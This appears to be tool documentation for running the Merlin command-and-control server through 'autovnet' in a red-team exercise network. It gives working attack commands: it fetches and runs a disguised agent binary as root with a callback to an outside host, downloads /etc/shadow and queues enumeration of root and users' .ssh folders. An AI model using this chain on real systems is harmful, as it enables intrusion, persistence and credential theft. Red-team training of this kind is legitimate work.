# merlin

[TOC]

## merlin

[merlin](https://github.com/Ne0nd0g/merlin) is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.

  * [merlin documentation](https://merlin-c2.readthedocs.io/en/latest/)

## Concepts

* `merlin server` runs on your local (e.g. Kali) system, and listens for connections
    - The `server` can have multiple listeners, that are bound to different ports and use different protocols
    - You (the Red Teamer) type commands into the `server` after it starts
* `merlin agent` runs on the target system, and will beacon (periodically connect) to the `merlin server`
* The `agent` sleeps between connections to the `server`
    - Commands that you queue for an `agent` will be executed the next time the `agent` connects to the server
    - This means there will be a noticable delay between when you type a commmand and when you get results - this is expected

## merlin + autovnet

`autovnet`'s [powerful networking features](../rdn/README.md) works with the `merlin` server transparently.

On the wire, the `agent` will connect to an `autovnet` `listen`er (or `tun`).
`autovnet` will then deliver those packets over a convoy of carrier pigeons to the `merlin server` ... or something.

(The connection will eventually get to the `merlin server`, and everything will Just Work).

### Workflow

The basic workflow is

* `autovnet rtfm merlin server`
    - Creates a merlin server, generates a codename
    - You get the `merlin` (server) prompt, which lets you send commands to `agents` that connect

* `autovnet rtfm merlin listener CODENAME`
    - Configures (and starts) listeners for the previously started `merlin server`
    - Also sets up the necessary `autovnet` `listen`ers and registers [dns](https://autovtools.gitlab.io/autovrtfm/autovnet-docs/usage/rdn/dns/) names, exposing your `merlin` server via multiple, unique IoCs

* Deploy an agent from (`/opt/rtfm/merlin/CODENAME/bin`)

## ⚠ Container Mounts / Merlin Data ⚠

`autovnet` will execute the `merlin server` within a `docker` container, using `docker-compose`.

This is a good idea for a variety of reasons, but causes a potentional surprise you need to be aware of:

* The file system within the `merlin server` container is **not** the same as your Kali's file system
    - It is a **temporary** sandbox that will be deleted permanently when you stop the `merlin server`.

So how would you upload or download files?

* For a file upload to happen, the `merlin server` must read the file and send it to the agent
    - But the file you want to upload is on your Kali system, not inside the `server` sandbox

* Similarly, if you download a file from the `agent`, the `merlin server` will write that file within the sandbox
    - But we want to access our "loot" from our Kali system.

To make this possible, `autovnet` uses [bind mounts / volumes](https://docs.docker.com/compose/compose-file/#volumes).

A directory from your Kali system is mounted within the `merlin server` container.

Both the container and your host system share the directory, so you can use it to transfer files back and forth.

These directories are persistent and saved on your Kali system under `/opt/rtfm/merlin` by default.

### Mount Location

When you start the `server`, you'll see output like:
```bash
...
[+] mnt: /opt/rtfm/mnt => /opt/rtfm/mnt             
[+] mnt: /opt/rtfm/merlin/ablaze_key => /opt/merlin
...
```

This indicates that `/opt/rtfm/mnt` on your Kali system is mounted within the merlin server at `/opt/rtfm/mnt`

  * Because these paths are the same, it's a convenient place to put things

Here, `ablaze_key` is the codename of the `server`.

`/opt/rtfm/merlin/ablaze_key` on your Kali system is mounted within the merlin server at `/opt/merlin`, and contains all data specific to this instance of the `merlin` server.

  * `/opt/rtfm/merlin/ablaze_key/bin` contains the `agent` binaries, downloaded from the [merlin releases](https://github.com/Ne0nd0g/merlin/releases/)

### Examples

## server

Starting the `server` is easy.

You can run as many servers as you want, and each server can have as many listeners as you want.
  * `autovnet` makes port conflicts a thing of the past (at least for all protocols but `http3`, see below)

```bash
$ autovnet rtfm merlin server
================================================================================
 _______ _______  ______        _____ __   _
 |  |  | |______ |_____/ |        |   | \  |
 |  |  | |______ |    \_ |_____ __|__ |  \_|

================================================================================
[+] autovnet rtfm merlin malicious_pace
[+] listen: autovnet rtfm merlin listener malicious_pace
[+] script: autovnet rtfm merlin script malicious_pace
================================================================================
[+] mnt: /opt/rtfm/mnt => /opt/rtfm/mnt
[+] mnt: /opt/rtfm/merlin/malicious_pace => /opt/merlin
================================================================================
[+] type: /opt/rtfm/merlin/malicious_pace/type
[+] rc.d: /opt/rtfm/merlin/malicious_pace/rc.d
================================================================================
...
Merlin»
```

Like most `autovnet` commands, it generates a random CODENAME (here, `malicous_pace`) that you can use to restart this server later.

It also prints some example commands you might want to run (`listen` and `script`), and some info you may find useful (file paths to the mounted directories).

Once you have started the `server`, you'll want to use the `autovnet rtfm listener` command (described below) to start one or more listeners.

### Advanced Topics

* `type` is a special file - anything you write to that file will be written to the `merlin server`, exactly as if you typed it.
* `rc.d` is a directory of files that should be typed on startup.


## merlin listener

The `merlin` listener command uses a hacky kind of scripting that essentially types keystrokes into your `merlin` `server` shell. (`merlin` does not seem to support scripting natively)

This technique should hopefully work on most normal Linux desktops / shell setups, but if you are using something weird (non-standard TTY setup), then YMMV.

By default, `listener`s that you configure using `autovnet rtfm merlin listener` will be restarted if you restart the `merlin` server using `autovnet rtfm merlin CODENAME`.

  * Under the hood, these are just files stored in `/opt/rtfm/merlin/CODENAME` - you can delete or modify them as desired.
  * See help menus for options that control this behavior

## http2

`http2` is the default `listener` type.

Here is an end-to-end example of using `merlin` (through `autovnet`) with an `http2` listener.

### Start the Server
```bash
$ autovnet rtfm merlin server                                                             
...
[+] autovnet rtfm merlin draconian_concern                    
[+] listen: autovnet rtfm merlin listener draconian_concern   
...
Merlin»
```

### Configure Listener

The `listener` command will type into the terminal running the `merlin` `server`, setting up a `merlin` listener.

It will also set up `autovnet` redirection, register DNS names for your listener, and print example commands for starting the agent.

```bash
$ autovnet rtfm merlin listener draconian_concern
...
[+] draconian_concern.responsible_contribution
[+] agent -proto h2 -url https://248.143.94.234
[+] agent -proto h2 -url https://boorish.line.avn
...
[+] draconian_concern | 248.143.94.234:443 => 127.0.0.1:50537
boorish.line.avn:248.143.94.234
```

### Stage Agent

It's up to you to get your agent binary executing on a target system.
This is just a simple example of how you could stage and serve your payload using `autovnet`.

```bash
$ autovnet tmp shell
[+] /opt/rtfm/tmp/cooing_soup

$ cp /opt/rtfm/merlin/draconian_concern/bin/merlinAgent-Linux-x64 updated
$ autovnet rtfm share .
[+] autovnet rtfm share somber_yard
[+] =======================================
[+] Sharing: /opt/rtfm/tmp/cooing_soup
[+] =======================================
[+] http://247.133.57.158
[+] =======================================
[+] https://254.192.198.110
[+] =======================================
rare.deep.avn:247.133.57.158
fumbling.brick.avn:254.192.198.110
```
Our `merlin` `agent` binary is now being served at `https://fumbling.brick.avn/updated`

### Deploy Agent

This example assumes a Linux target (named `target`) for which we have known credentials.
```bash
$ .proxy-ssh target@target
$ echo $SSH_CLIENT
248.69.21.233 32906 22

$ curl -k https://fumbling.brick.avn/updated -o /tmp/updated
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 8732k  100 8732k    0     0   105M      0 --:--:-- --:--:-- --:--:--  106M
$ chmod +x /tmp/updated 
$ ls -alh /tmp/updated
-rwxrwxr-x 1 target target 8.6M Jul 17 13:05 /tmp/updated
$ sudo -i
# /tmp/updated -url https://boorish.line.avn
```

### Receive Callback

The `merlin` `agent` should check in after a minute or so.
Remember, `merlin` beacons, so there will be a significant delay between commands and their output.
(See [the merlin documentation](https://merlin-c2.readthedocs.io/en/latest/server/menu/agents.html#sleep) for changing these tunables)

You will see the checkin message in the terminal running the `server`.
You will use that terminal to control the `agent` as well.

```bash
Merlin»  
[+] New authenticated agent checkin for 09b3c223-f371-42e2-8a2d-a24785e3647f at 2022-07-17T17:07:49Z
```

### Use the Agent

[Read the merlin documentation](https://merlin-c2.readthedocs.io/en/latest/index.html).
This is just an example, and may become outdated as `merlin` changes.


Here, we download `/etc/passwd` and `/etc/shadow`, and run the `w` command.
```bash
Merlin» agent list

               AGENT GUID              |    TRANSPORT    |  PLATFORM   | HOST | USER |    PROCESS    | STATUS | LAST CHECKIN | NOTE  
+--------------------------------------+-----------------+-------------+------+------+---------------+--------+--------------+------+
  09b3c223-f371-42e2-8a2d-a24785e3647f | HTTP/2 over TLS | linux/amd64 | dev  | root | updated(5397) | Active | 0:00:16 ago  |       

Merlin» interact 09b3c223-f371-42e2-8a2d-a24785e3647f 
Merlin[agent][09b3c223-f371-42e2-8a2d-a24785e3647f]» download /etc/passwd
Merlin[agent][09b3c223-f371-42e2-8a2d-a24785e3647f]»  
[-] Created job NGJosdaSCN for agent 09b3c223-f371-42e2-8a2d-a24785e3647f at 2022-07-17T17:13:51Z
Merlin[agent][09b3c223-f371-42e2-8a2d-a24785e3647f]» download /etc/shadow
Merlin[agent][09b3c223-f371-42e2-8a2d-a24785e3647f]»  
[-] Created job AWpBpTackH for agent 09b3c223-f371-42e2-8a2d-a24785e3647f at 2022-07-17T17:13:56Z
Merlin[agent][09b3c223-f371-42e2-8a2d-a24785e3647f]» shell w
Merlin[agent][09b3c223-f371-42e2-8a2d-a24785e3647f]»  
[-] Created job iGUMhrsbBX for agent 09b3c223-f371-42e2-8a2d-a24785e3647f at 2022-07-17T17:14:05Z
[+]Results for 09b3c223-f371-42e2-8a2d-a24785e3647f at 2022-07-17T17:14:53Z
[+]Successfully downloaded file /etc/passwd with a size of 2896 bytes from agent 09b3c223-f371-42e2-8a2d-a24785e3647f to /opt/merlin/data/agents/09b3c223-f371-42e2-8a2d-a24785e3647f/passwd
[+]Results for 09b3c223-f371-42e2-8a2d-a24785e3647f at 2022-07-17T17:14:53Z

[-] Results job NGJosdaSCN for agent 09b3c223-f371-42e2-8a2d-a24785e3647f at 2022-07-17T17:14:53Z
[+]Successfully downloaded file /etc/shadow with a size of 1553 bytes from agent 09b3c223-f371-42e2-8a2d-a24785e3647f to /opt/merlin/data/agents/09b3c223-f371-42e2-8a2d-a24785e3647f/shadow

[-] Results job AWpBpTackH for agent 09b3c223-f371-42e2-8a2d-a24785e3647f at 2022-07-17T17:14:53Z

[-] Results job iGUMhrsbBX for agent 09b3c223-f371-42e2-8a2d-a24785e3647f at 2022-07-17T17:14:53Z

[+]  13:14:20 up  4:43,  2 users,  load average: 0.04, 0.05, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
target   pts/0    248.69.21.233    13:04    7:32   0.03s  0.03s sshd: target [priv] 
target   pts/1    248.69.21.233    13:06    6:20   8.45s  0.02s sudo -i
```

Note that `merlin` `server` claims the files where written to `/opt/merlin/data/agents/...`.
That corresponds to `/opt/rtfm/merlin/CODENAME/data/agents/...` outside the container.

On you Kali system:
```bash
$ ls -alh /opt/rtfm/merlin/draconian_concern/data/agents/09b3c223-f371-42e2-8a2d-a24785e3647f
total 20K
drwxr-x--- 2 ... 4.0K Jul 17 13:14 .
drwxr-x--- 3 ... 4.0K Jul 17 13:07 ..
-rw------- 1 ... 2.3K Jul 17 13:14 agent_log.txt
-rw------- 1 ... 2.9K Jul 17 13:14 passwd
-rw------- 1 ... 1.6K Jul 17 13:14 shadow
```

### Recap

In this simple example, we have have created a simple attack chain with actually interesting associated IoCs:

* Log in (SSH) from `248.69.21.233`
* Download payload (HTTPS) from `fumbling.brick.avn` / `254.192.198.110`
* Agent beacons (HTTP/2) to `boorish.line.avn` / `248.143.94.234`

## http

See [http2](#http2) for a more detailed, end-to-end example.
This assumes your `merlin` `server` already running and an agent ready to execute.

### Start Listener

```bash
$ autovnet rtfm merlin listener draconian_concern -P http
...
[+] agent -proto http -url http://243.97.157.58
[+] agent -proto http -url http://faithful.literature.avn
...
```

### Start New Agent
(On target)
```bash
/tmp/updated -proto http -url http://faithful.literature.avn
```
The server should get a check-in.

## h2c

See [http2](#http2) for a more detailed, end-to-end example.
This assumes your `merlin` `server` already running and an agent ready to execute.

### Start Listener

```bash
$ autovnet rtfm merlin listener draconian_concern -P h2c
...
[+] agent -proto h2c -url http://254.128.68.186
[+] agent -proto h2c -url http://uneven.repair.avn
...
```
### Start New Agent

(On target)
```bash
/tmp/updated -proto h2c -url http://uneven.repair.avn
```
The server should get a check-in.

## https

See [http2](#http2) for a more detailed, end-to-end example.
This assumes your `merlin` `server` already running and an agent ready to execute.

```bash
$ autovnet rtfm merlin listener draconian_concern -P https
...
[+] agent -proto https -url https://245.208.57.55
[+] agent -proto https -url https://coordinated.reality.avn
...
```

### Start New Agent

(On target)
```bash
/tmp/updated -proto https -url https://coordinated.reality.avn
```
The server should get a check-in.

## http3 (QUIC)

⚠  **`http3` is not like the other protocols and requires a bit more effort to use.** ⚠

Why? [QUIC is a UDP protocol](https://www.chromium.org/quic/).
`autovnet`'s [listen](../rdn/listen.md) feature only works with `TCP` (because it's based on `SSH` tunnels).

Thankfully, `autovnet`'s [tun](../rdn/tun.md) feature supports `UDP` (and just about anything else).

If you want to use `merlin` with `http3`, you must set up a [tun](../rdn/tun.md).

* Because a `tun` makes any "public" (bound to `0.0.0.0`) services accessible to the game network, use with caution
* `tun` provides IP remapping, not port remapping. So the port you bind to on your host is the port the target will see.
  - `:443` is the default and recommended, but be aware this will conflict with any other services bound to `:443` locally


Both the `agent` and `server` may generate a warning like
> ... failed to sufficiently increase receive buffer size ...

This is fine, just ignore it.

### Start Listener

The output for `http3` is different, because it is special
```bash
$ autovnet rtfm merlin listener draconian_concern -P http3
...
[!] http3 is UDP - expose: autovnet rtfm tun up
[+] agent -proto http3 -url https://MAP_IP
...
```

As indicated, we need to start a `tun` (if we don't have one already) so we can expose this UDP listener to the game network.

### Start Tun

See [tun](../rdn/tun.md) for more details.

```bash
$ autovnet rtfm tun up -R
...
[+] map_ip: 243.79.112.71
stale.attempt.avn:243.79.112.71
[>] Roll new IP?
 [y/N]:
```

The `map_ip` is the "public" IP that that the agent should call back to.

Obviously, if you choose to roll your IP / DNS name, the old one will stop working,
meaning that your `agent` will not longer be able to reach your `server`.

So only roll if you want to change your IoCs and are able to restart / redeploy new agents.

### Start New Agent

(On target)

Note we need to use the `map_ip` (or DNS name) generated by the `tun`.
```bash
/tmp/updated -proto http3 -url https://stale.attempt.avn
```
The server should get a check-in.

## scripting

[merlin](https://merlin-c2.readthedocs.io/en/latest/) does not appear to natively support scripting.

`autovnet` includes a hacky version of `merlin` scripting, based on the same technique it uses to set up listeners for you.

  * There are serious limitations to this approach (no way to detect errors, your current menu context changes what commands are valid, etc.)
  * This technique should hopefully work on most normal Linux desktops / shell setups, but if you are using something weird (non-standard TTY setup), then YMMV

To further frustrate scripting, `merlin` does not seem to execute queued jobs in order, so use caution if trying to queue related commands together.

There is also no obvious way to reliably introduce a delay between commands. (e.g. run a `shell` command that creates a file, wait X seconds, then `download` it).

Still, some scripting is better that none.

### Example

Here is a simple example of using the rudimentary `merlin` scripting added by `autovnet`.

This command will create a file (`/tmp/merlin-enum.rc`) that is a sequence of (currently) valid `merlin` commands that do some basic enumeration.
```bash
cat << EOF > /tmp/merlin-enum.rc
sleep 1s
download /etc/passwd
download /etc/shadow
shell w
shell lastlog
shell cat /etc/*-release
shell ps -elfww --forest
shell find /etc
shell find /root
shell find /home/*/.ssh/
sleep 30s
EOF
```

Note that the `autovnet merlin script` command is context-dependant: the currently state of your `merlin server` (what menu you are looking at) matters.

These commands are only valid in the `agent` menu.

In the `merlin` server, interact with an `agent` (Linux)
```bash
Merlin» interact 103ab5c6-46ec-4aca-8b39-8ea9990d9678 
Merlin[agent][103ab5c6-46ec-4aca-8b39-8ea9990d9678]»
```

Now, we can throw a script at the server, and queue multiple commands for the agent

```bash
$ autovnet rtfm merlin script draconian_concern /tmp/merlin-enum.rc
[+] type: /tmp/merlin-enum.rc -> /opt/rtfm/merlin/draconian_concern/type
```

All the commands are typed into the merlin server.

Eventually, the agent will complete them all, and return a massive amount of output.

The output can be viewed in more detail in `/opt/rtfm/merlin/draconian_concern/data/agents/<AGENT_ID>/agent_log.txt`
